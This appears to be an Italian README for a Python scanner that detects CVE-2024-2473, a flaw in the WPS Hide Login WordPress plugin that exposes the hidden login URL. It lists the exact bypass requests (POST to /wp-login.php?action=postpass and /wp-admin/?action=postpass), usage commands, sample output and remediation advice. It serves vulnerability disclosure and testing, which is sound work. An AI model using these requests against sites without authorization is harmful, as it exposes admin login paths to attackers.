
Divulgazione della pagina di login nascosta di WordPress. Rileva la divulgazione della pagina di login nei siti WordPress che utilizzano WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473)
Uno scanner Python professionale per rilevare la divulgazione della pagina di login nei siti WordPress che eseguono WPS Hide Login ≤ 1.9.15.2
Codificato da Venexy
WPS Hide Login è un popolare plugin per WordPress che consente agli amministratori di modificare l'URL predefinito /wp-login.php in un percorso personalizzato nascosto — agendo come sicurezza tramite oscurità.
Questo scanner rileva CVE-2024-2473, una vulnerabilità in cui il parametro action=postpass può essere fornito per bypassare completamente il meccanismo di protezione del plugin, esponendo l'URL della pagina di login nascosta a utenti non autenticati.
Il plugin WPS Hide Login sposta la pagina di login di WordPress dall'URL predefinito /wp-login.php a un URL personalizzato scelto dall'amministratore. Tuttavia, in tutte le versioni fino alla 1.9.15.2 incluse, fornire il parametro query action=postpass a /wp-login.php o /wp-admin/ bypassa questa protezione, rivelando l'URL effettivo dell'azione del modulo di login nascosto — esponendo di fatto il percorso di login segreto a qualsiasi utente non autenticato.
Lo scanner replica il flusso di attacco della vulnerabilità in tre fasi:
Fase 1 ─► Conferma che il target sia un'installazione WordPress
│
▼
Fase 2a ─► POST /wp-login.php?action=postpass
con corpo: action=lostpassword&post_password=test
Controllo: HTTP 200 + lostpasswordform presente + nessun wp-login.php nel corpo
Estrai URL di login nascosto dall'attributo action del modulo
│
Fase 2b ─► POST /wp-admin/?action=postpass
Controllo: Reindirizzamento HTTP 302 verso una posizione contenente reauth=1 o /login
│
▼
Segnala URL di login nascosto se scoperto
Se la Fase 2a o la Fase 2b corrisponde, il target viene contrassegnato come vulnerabile.
requests1. Clona il repository
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473
2. Installa le dipendenze
pip install requests
Nota: Su sistemi che utilizzano ambienti virtuali Python o Kali Linux, potresti aver bisogno di:
pip install requests --break-system-packages
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]
| Argomento | Descrizione | Predefinito |
|---|---|---|
-u, --url |
# Scansione base
python CVE-2024-2473.py -u https://example.com
# Scansione con timeout personalizzato
python CVE-2024-2473.py -u https://example.com --timeout 15
# Scansione su HTTP
python CVE-2024-2473.py -u http://192.168.1.100
...
┌─────────────────────────────────────────────────────────────┐
│ CVE-2024-2473 • Identificatore Pagina di Login WPS Hide │
│ Codificato da Venexy | https://github.com/m4xsec │
└─────────────────────────────────────────────────────────────┘
===============================================================
TARGET https://example.com
ORA 2024-11-01 18:00:00
TIMEOUT 10s
===============================================================
[18:00:00] [*] Fase 1 | Rilevamento installazione WordPress ...
[18:00:01] [+] WordPress confermato — https://example.com
[18:00:01] [*] Fase 2 | Test dei vettori di bypass CVE-2024-2473 ...
[18:00:01] [*] Vettore A | POST /wp-login.php?action=postpass
+- Stato : 200 Risultato : CORRISPONDENZA
[18:00:02] [*] Vettore B | POST /wp-admin/?action=postpass
+- Stato : 302 Risultato : CORRISPONDENZA
###############################################################
## VULNERABILITÀ CONFERMATA -- CVE-2024-2473 ##
###############################################################
Plugin WPS Hide Login <= 1.9.15.2
Gravità Media (CVSS 5.3 / EPSS 93° percentile)
CWE CWE-200 — Esposizione di Informazioni Sensibili
Vettore CVSS AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N
[18:00:02] [VULN] Bypass confermato tramite /wp-login.php?action=postpass
====================================================
URL DI LOGIN NASCOSTO SCOPERT
====================================================
>> https://example.com/my-secret-admin-path/
====================================================
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Ottieni sempre esplicita autorizzazione scritta dal proprietario del sistema target prima di condurre qualsiasi valutazione di sicurezza. La scansione o lo sfruttamento non autorizzati dei sistemi sono illegali e non etici.
Usalo in modo responsabile.
Codificato con ❤️ da Venexy
Se questo strumento ti è stato utile, considera di dare una ⭐ al repository 🌟🌟🌟
| Campo | Dettagli |
|---|
| ID CVE | CVE-2024-2473 |
| Interessato | Plugin WPS Hide Login ≤ 1.9.15.2 per WordPress |
| Gravità | Media |
| Punteggio CVSS | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |
| CWE | CWE-200 — Esposizione di Informazioni Sensibili |
| Punteggio EPSS | 0.10433 (93° percentile) |
| Autenticazione Richiesta | Nessuna |
| Fornitore | WPServeur |
| Rimedio | Aggiornare il plugin alla versione > 1.9.15.2 |
| URL base del target WordPress (obbligatorio) |
| — |
-t, --timeout | Timeout della richiesta HTTP in secondi | 10 |
| Risorsa | Link |
|---|
| NVD — CVE-2024-2473 | https://nvd.nist.gov/vuln/detail/CVE-2024-2473 |
| Avviso Wordfence | https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure |
| Plugin WPS Hide Login | https://wordpress.org/plugins/wps-hide-login/ |
| CWE-200 | https://cwe.mitre.org/data/definitions/200.html |
| Calcolatrice CVSS 3.1 | https://www.first.org/cvss/calculator/3.1 |